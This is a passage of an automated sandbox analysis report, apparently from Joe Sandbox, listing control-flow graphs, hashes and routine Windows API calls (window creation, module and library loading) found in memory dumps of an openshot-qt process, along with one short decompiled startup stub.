                                                                    • Opcode Fuzzy Hash: bbbdaa4c200cd7a63ee6fac5b3b3c54418d8fd35c1c54f1675b0d931f3f9f458
                                                                    • Instruction Fuzzy Hash: 885128B450A7028BD713AF65D56822EBBE4BF44784F028D1CE8848B2D1DBB58884DB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 203 6fd197a-6fd1995 call 6fd092c 206 6fd19ab-6fd19af 203->206 207 6fd1997 203->207 208 6fd19b1-6fd19bb 206->208 209 6fd19c3-6fd1a04 206->209 258 6fd199d call 6fd1c08 207->258 259 6fd199d call 6fd1bf8 207->259 208->209 214 6fd1a06-6fd1a0e 209->214 215 6fd1a11-6fd1a1f 209->215 210 6fd19a3-6fd19a5 210->206 211 6fd1ae0-6fd1ba0 210->211 251 6fd1ba8-6fd1bd3 GetModuleHandleW 211->251 252 6fd1ba2-6fd1ba5 211->252 214->215 216 6fd1a21-6fd1a26 215->216 217 6fd1a43-6fd1a45 215->217 219 6fd1a28-6fd1a2f call 6fd0938 216->219 220 6fd1a31 216->220 221 6fd1a48-6fd1a4f 217->221 224 6fd1a33-6fd1a41 219->224 220->224 225 6fd1a5c-6fd1a63 221->225 226 6fd1a51-6fd1a59 221->226 224->221 228 6fd1a65-6fd1a6d 225->228 229 6fd1a70-6fd1a79 225->229 226->225 228->229 233 6fd1a7b-6fd1a83 229->233 234 6fd1a86-6fd1a8b 229->234 233->234 235 6fd1a8d-6fd1a94 234->235 236 6fd1aa9-6fd1aad 234->236 235->236 237 6fd1a96-6fd1aa6 call 6fd0778 call 6fd0948 235->237 256 6fd1ab0 call 6fd1ec8 236->256 257 6fd1ab0 call 6fd1eb8 236->257 237->236 240 6fd1ab3-6fd1ab6 243 6fd1ad9-6fd1adf 240->243 244 6fd1ab8-6fd1ad6 240->244 244->243 253 6fd1bdc-6fd1bf0 251->253 254 6fd1bd5-6fd1bdb 251->254 252->251 254->253 256->240 257->240 258->210 259->210
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06FD1BC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID: ln:$ln:
                                                                    • API String ID: 4139908857-1543152212
                                                                    • Opcode ID: 6ac04a1e722d5ad40da255a8f9d6611b78391e4b30e2fa8574e5e6dbdb4c813b
                                                                    • Instruction ID: 34b70090c5942b9a8a0f5135b23f05eb850e1d31166e4267caafb4e3f3bf5e42
                                                                    • Opcode Fuzzy Hash: 6ac04a1e722d5ad40da255a8f9d6611b78391e4b30e2fa8574e5e6dbdb4c813b
                                                                    • Instruction Fuzzy Hash: 807122B4A00B058FD7A4DF6AD44175ABBF2FF88204F048A2DD48AD7A50DB75F809CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 260 301124-30116d __wgetmainargs
                                                                    C-Code - Quality: 100%
                                                                    			E00301124() {
                                                                    				intOrPtr* _v28;
                                                                    				intOrPtr _v32;
                                                                    				intOrPtr _v36;
                                                                    				intOrPtr _v40;
                                                                    				intOrPtr _t6;
                                                                    				void* _t7;
                                                                    
                                                                    				_v28 = 0x30e00c;
                                                                    				 *0x30e00c =  *0x30f0b0;
                                                                    				_t6 =  *0x309014;
                                                                    				_v36 = 0x30e01c;
                                                                    				_v32 = _t6;
                                                                    				_v40 = 0x30e020;
                                                                    				 *((intOrPtr*)(_t7 - 0x2c)) = 0x30e024; // executed
                                                                    				L003083C8(); // executed
                                                                    				return _t6;
                                                                    			}









                                                                    0x00301138
                                                                    0x00301140
                                                                    0x00301145
                                                                    0x0030114a
                                                                    0x00301152
                                                                    0x00301156
                                                                    0x0030115e
                                                                    0x00301165
                                                                    0x0030116d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: __wgetmainargs
                                                                    • String ID: 0$x0
                                                                    • API String ID: 1709950718-2285436923
                                                                    • Opcode ID: a2341f7a7a465b4f6aacaef52094b7eaf33292b35ee5b1f7be1f3d2dfc3b6fcc
                                                                    • Instruction ID: 5da9648f2910d89c57096c95432602321d61f938e269ad4a7749ad658bb6c514
                                                                    • Opcode Fuzzy Hash: a2341f7a7a465b4f6aacaef52094b7eaf33292b35ee5b1f7be1f3d2dfc3b6fcc
                                                                    • Instruction Fuzzy Hash: 97E0B6B9A06301CFC712DF2AD4A4206BBE0BB88304F009D5DE59857350D3B5A5489F93
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 312 6fd3a0c-6fd3a14 313 6fd3a35-6fd3a7e 312->313 314 6fd3a16-6fd3a32 312->314 316 6fd3a89-6fd3a90 313->316 317 6fd3a80-6fd3a86 313->317 314->313 318 6fd3a9b-6fd3ad3 316->318 319 6fd3a92-6fd3a98 316->319 317->316 320 6fd3adb-6fd3b3a CreateWindowExW 318->320 319->318 321 6fd3b3c-6fd3b42 320->321 322 6fd3b43-6fd3b7b 320->322 321->322 326 6fd3b7d-6fd3b80 322->326 327 6fd3b88 322->327 326->327 328 6fd3b89 327->328 328->328
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06FD3B2A
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 19a0f79662bb321f41bab9391da640abb5ccd4c423bd158f6f550b23e6305c88
                                                                    • Instruction ID: c8cfa02046a76e9ef8b243bd5a11ca931e1caeb35db9acbbf7e4aacc3f57b006
                                                                    • Opcode Fuzzy Hash: 19a0f79662bb321f41bab9391da640abb5ccd4c423bd158f6f550b23e6305c88
                                                                    • Instruction Fuzzy Hash: BB51E2B5D003099FDB14CF99C984ADEBBB6FF48310F24862AE815AB250D775A885CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 329 6fd3a18-6fd3a7e 331 6fd3a89-6fd3a90 329->331 332 6fd3a80-6fd3a86 329->332 333 6fd3a9b-6fd3b3a CreateWindowExW 331->333 334 6fd3a92-6fd3a98 331->334 332->331 336 6fd3b3c-6fd3b42 333->336 337 6fd3b43-6fd3b7b 333->337 334->333 336->337 341 6fd3b7d-6fd3b80 337->341 342 6fd3b88 337->342 341->342 343 6fd3b89 342->343 343->343
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06FD3B2A
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 7cb167c39222b3da65956da19d0db412623c972e36f39b9e18ac6c58d3ef3670
                                                                    • Instruction ID: 1ec3342d0d6b92ad23206a8d90c265a6d6a516596ebd6ce3f85bdc27d42701a6
                                                                    • Opcode Fuzzy Hash: 7cb167c39222b3da65956da19d0db412623c972e36f39b9e18ac6c58d3ef3670
                                                                    • Instruction Fuzzy Hash: 9941D2B5D003099FDB14CF99C984ADEBBB6BF48310F24852AE419AB250D774A845CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 344 6fd4a7c-6fd647c 347 6fd652c-6fd654c call 6fd0ad4 344->347 348 6fd6482-6fd6487 344->348 356 6fd654f-6fd655c 347->356 350 6fd6489-6fd64c0 348->350 351 6fd64da-6fd6512 CallWindowProcW 348->351 357 6fd64c9-6fd64d8 350->357 358 6fd64c2-6fd64c8 350->358 352 6fd651b-6fd652a 351->352 353 6fd6514-6fd651a 351->353 352->356 353->352 357->356 358->357
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06FD6501
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 715895d3866a0c4b165735cf7506cde8b04894c58c23fb8f6cbcfcbb6bb3882a
                                                                    • Instruction ID: fbdfe788cd28c6e935f7d5704ad1f194a8a36847ce8d2d321832fc140ae1bd38
                                                                    • Opcode Fuzzy Hash: 715895d3866a0c4b165735cf7506cde8b04894c58c23fb8f6cbcfcbb6bb3882a
                                                                    • Instruction Fuzzy Hash: 9F413DB99002098FDB54CF59C884B9ABBF6FF88314F28C459D415A7325D775E841CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 361 3ad01c-3ad02e 362 3ad09d-3ad0a4 361->362 363 3ad030 361->363 364 3ad032-3ad03e 362->364 363->364 366 3ad040-3ad062 364->366 367 3ad0a6-3ad0ab 364->367 368 3ad0ad-3ad0c2 366->368 369 3ad064-3ad07f DrawFrame 366->369 367->366 372 3ad081-3ad089 368->372 371 3ad0cf 369->371 369->372 374 3ad08b-3ad09c 372->374 375 3ad0c4-3ad0cd 372->375 375->374
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.528237157.00000000003AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 003AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_3ad000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: DrawFrame
                                                                    • String ID:
                                                                    • API String ID: 50286260-0
                                                                    • Opcode ID: 02795d154d0a24462cedd6fe4bc7f635fd2e891319a88045fecacdc63f73fc25
                                                                    • Instruction ID: 4f3ca4f7a31d87e60872a4f4821480ac9dc2ed6e44b4dddc328dacfb6ad2f437
                                                                    • Opcode Fuzzy Hash: 02795d154d0a24462cedd6fe4bc7f635fd2e891319a88045fecacdc63f73fc25
                                                                    • Instruction Fuzzy Hash: 481138B15443849FDB22DF28D9C4B2ABBA9FB45714F308A7DD4474BA41C33AD847C662
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 377 3ad006-3ad02e 379 3ad09d-3ad0a4 377->379 380 3ad030 377->380 381 3ad032-3ad03e 379->381 380->381 383 3ad040-3ad062 381->383 384 3ad0a6-3ad0ab 381->384 385 3ad0ad-3ad0c2 383->385 386 3ad064-3ad07f DrawFrame 383->386 384->383 389 3ad081-3ad089 385->389 388 3ad0cf 386->388 386->389 391 3ad08b-3ad09c 389->391 392 3ad0c4-3ad0cd 389->392 392->391
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.528237157.00000000003AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 003AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_3ad000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: DrawFrame
                                                                    • String ID:
                                                                    • API String ID: 50286260-0
                                                                    • Opcode ID: ecebed58d581894e683b45239d82ff08a53384ff9775a4e428c9df159c9d75eb
                                                                    • Instruction ID: 13f2588834f0fd0049de883289d523a9c7ba9eb194c699e2e0e5d72bb8376412
                                                                    • Opcode Fuzzy Hash: ecebed58d581894e683b45239d82ff08a53384ff9775a4e428c9df159c9d75eb
                                                                    • Instruction Fuzzy Hash: 771182B14487C08FDB13DF24D994715BFB0EB56314F2986EAC8858B693D33A984AC762
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 394 6fd0970-6fd1e08 396 6fd1e0a-6fd1e0d 394->396 397 6fd1e10-6fd1e3f LoadLibraryExW 394->397 396->397 398 6fd1e48-6fd1e65 397->398 399 6fd1e41-6fd1e47 397->399 399->398
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06FD1C41,00000800,00000000,00000000), ref: 06FD1E32
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 8827ec41c628e2fa1535ce71939649657cd90bd42345f139efa741eb7501b88d
                                                                    • Instruction ID: 7708f911e6c79040e4e964e195c4e3bdf617350eb2dec80041a08bf4ca141283
                                                                    • Opcode Fuzzy Hash: 8827ec41c628e2fa1535ce71939649657cd90bd42345f139efa741eb7501b88d
                                                                    • Instruction Fuzzy Hash: 941114B6D002098FDB10CF9AD844ADEFBF6EB48314F14842EE415B7600C3B9A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 402 6fd1dc2-6fd1e08 404 6fd1e0a-6fd1e0d 402->404 405 6fd1e10-6fd1e3f LoadLibraryExW 402->405 404->405 406 6fd1e48-6fd1e65 405->406 407 6fd1e41-6fd1e47 405->407 407->406
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06FD1C41,00000800,00000000,00000000), ref: 06FD1E32
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 0e41db3df1f4c01d7bbe676239ff00f96de8e794b4c4d28f394862f738816d3e
                                                                    • Instruction ID: 3188a3d7c6ea56eedf15428461db2102c3761410b7fe6ad97b2cca4d5dba864b
                                                                    • Opcode Fuzzy Hash: 0e41db3df1f4c01d7bbe676239ff00f96de8e794b4c4d28f394862f738816d3e
                                                                    • Instruction Fuzzy Hash: D01126B6D002098FDB10CF9AC884BDEFBF5EB48324F14851ED815A7600C379A545CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06FD1BC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 157fe4a1d3f2efcacbf3a1a0b52ab16a260e24065f24311129a2afa08c80054b
                                                                    • Instruction ID: 1302dd71ca1192dc5d2523cff799990bfca28fb6a7fad72146644d4f95702ce8
                                                                    • Opcode Fuzzy Hash: 157fe4a1d3f2efcacbf3a1a0b52ab16a260e24065f24311129a2afa08c80054b
                                                                    • Instruction Fuzzy Hash: 271110BAD006098FCB20CF9AD844BDEFBF5AB88324F14851AD419B7700D3B9A545CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.528169820.000000000039D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0039D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_39d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a59ab34022a9d35ca50fb77ec1abbec76f30f6f74f1d4dd0e4179acb0a0be87f
                                                                    • Instruction ID: 0babb0d4d4d8068e3cf0f28de6b3d17a20792c953e9b381e3223a6d5c20de639
                                                                    • Opcode Fuzzy Hash: a59ab34022a9d35ca50fb77ec1abbec76f30f6f74f1d4dd0e4179acb0a0be87f
                                                                    • Instruction Fuzzy Hash: 9A213776504244DFDF16DF18D9C1B17BF65FB98328F24856DE80A0B246C33AD856CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.528169820.000000000039D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0039D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_39d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5e337004bec56fb9900c17cbfecd9638d1469311b420d6b66a07978b80ab97f
                                                                    • Instruction ID: 40b868ceefab51ccdf6717671cc8dea91f37397ae56d602ea71ccd64339d8873
                                                                    • Opcode Fuzzy Hash: f5e337004bec56fb9900c17cbfecd9638d1469311b420d6b66a07978b80ab97f
                                                                    • Instruction Fuzzy Hash: 2C212576500244DFDF16CF18D9C1B17BF65FB98324F248569E8090B246C33AD856DBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.528169820.000000000039D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0039D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_39d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                    • Instruction ID: 2b85983889de59689601c0768b53abee1b2ba0635514875d0ba839d09092b967
                                                                    • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                    • Instruction Fuzzy Hash: 9411D076504280DFCF12CF14D9C4B16BF71FB84324F28C6A9D8494B656C33AD85ACBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.528169820.000000000039D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0039D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_39d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                    • Instruction ID: ed2c3fe67ea777ff6e4f0f645c971062ba8a1d9025ecd2689eda204e4e6ae718
                                                                    • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                    • Instruction Fuzzy Hash: ED11D376504280CFCF16CF14D9C4B16BF71FB94324F28C6A9D8494B656C33AD856CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.528144483.0000000000393000.00000040.00000800.00020000.00000000.sdmp, Offset: 00393000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_393000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 942b845ece82774c7d65531669e75d6fa0078ed2c8e0fd2af1a36af98f27f9ea
                                                                    • Instruction ID: 6212af5717018afd9bb8b754593a4db8ec4b04c56044be71b2b685cd504a0870
                                                                    • Opcode Fuzzy Hash: 942b845ece82774c7d65531669e75d6fa0078ed2c8e0fd2af1a36af98f27f9ea
                                                                    • Instruction Fuzzy Hash: 5B11C6B6104684DFEB21CF5AC984B26FBA8FB54720F14C85EE94A5B701C37DA944CB71
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8dc5e6ad9babe414c3061216d2c9c777a66f166e2263c81cd57065b0a8f6b712
                                                                    • Instruction ID: 0a4ea1b17dd029608e64248b22f9bd1a5ec2a808085d482e78971b5a4ec7d0d2
                                                                    • Opcode Fuzzy Hash: 8dc5e6ad9babe414c3061216d2c9c777a66f166e2263c81cd57065b0a8f6b712
                                                                    • Instruction Fuzzy Hash: 5A113C349193889FCB52DFB8D854699BFB0EF06201F1401EBD844DB2A2E7354E84CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.528144483.0000000000393000.00000040.00000800.00020000.00000000.sdmp, Offset: 00393000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_393000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 929d534034fb0a283eefba2db54d53a338116f614a231fef84e187f739c9c7e5
                                                                    • Instruction ID: df671fc10ef3bf5a9ec87d43a9c9b294ef18ca24c132f35d4811c016bacad2e9
                                                                    • Opcode Fuzzy Hash: 929d534034fb0a283eefba2db54d53a338116f614a231fef84e187f739c9c7e5
                                                                    • Instruction Fuzzy Hash: EA01D676104680DFEB21CF09D984B66FBA8FB94724F14C45EE9494B741C339A844CB71
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d70fd7669985e427db7623e7e7e567c8ad86f624e0f82297192d57aa62047947
                                                                    • Instruction ID: ee8932bbf2a35bf5b4d599cdffd26e5155052bd9e6bb6dbb2017d014ea69f3b0
                                                                    • Opcode Fuzzy Hash: d70fd7669985e427db7623e7e7e567c8ad86f624e0f82297192d57aa62047947
                                                                    • Instruction Fuzzy Hash: F6014B74D092889FCB52CFA8E89469CBFB0EF4A210F1441DAD844DB362E6354A45CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0cf66c7dbbc3150a0849da82b9d2394309136c182f8f2137c8e082e7e972213e
                                                                    • Instruction ID: 753278103440d84efed0f470d07c7fb923632c4c1e8c6443c437a650156b051b
                                                                    • Opcode Fuzzy Hash: 0cf66c7dbbc3150a0849da82b9d2394309136c182f8f2137c8e082e7e972213e
                                                                    • Instruction Fuzzy Hash: 82F0303090E3C49FC743CBB8996459D7FB0AF4B200F1941DBD884DB2A3D6384945DB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86960ed7e31e5d65e7fb30d16c802285027ffd56df66ee794b75d655cde9a5cd
                                                                    • Instruction ID: b2b22bea884cdc49826cdc64d3e575c47a0442b57521d73cc363ccb258249eeb
                                                                    • Opcode Fuzzy Hash: 86960ed7e31e5d65e7fb30d16c802285027ffd56df66ee794b75d655cde9a5cd
                                                                    • Instruction Fuzzy Hash: F9F0396041E3C19FC717977458696A97F30AF43204B5E42CFC480CB1A7D72A0809C366
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08a4001e7a283dca73c883e0460138d9e1a095477f80a62efe572fc6deb5eeb1
                                                                    • Instruction ID: 18e4377c160e0dec55599d8621c26b7b7631d42de40dc3a632f8cfad0782efdb
                                                                    • Opcode Fuzzy Hash: 08a4001e7a283dca73c883e0460138d9e1a095477f80a62efe572fc6deb5eeb1
                                                                    • Instruction Fuzzy Hash: E0F01C6040F3D49FCB039BB459245A97FB49F43205F5941EBD884DB6A3C67A0959C722
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8af66e2bb384feb80a707e83ad1e19ba3d71dcca8e917f544f6ec803d8386cee
                                                                    • Instruction ID: bc8d6e58dea933265c09ccad9dd486578a135cb66b17e80d6779d7181c501a91
                                                                    • Opcode Fuzzy Hash: 8af66e2bb384feb80a707e83ad1e19ba3d71dcca8e917f544f6ec803d8386cee
                                                                    • Instruction Fuzzy Hash: 30E07574E11208EFCB54DFA9E548A9DBBF4FF48304F2081A9D81497350E7359A40CF55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_2710000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8ab148de54c090a365034859a57ffc2651b40f5a866037402faceca9e5a457b0
                                                                    • Instruction ID: a76a3e51c14f82d9c47e099c7b7029fcc5a052d65b6e2e0c0a884ace9e88132c
                                                                    • Opcode Fuzzy Hash: 8ab148de54c090a365034859a57ffc2651b40f5a866037402faceca9e5a457b0
                                                                    • Instruction Fuzzy Hash: 9BE0EE74E04208AFCB40DFA9E4496ADBFF4EF49300F2082EAE804A7360D7359A40DB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.529266936.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
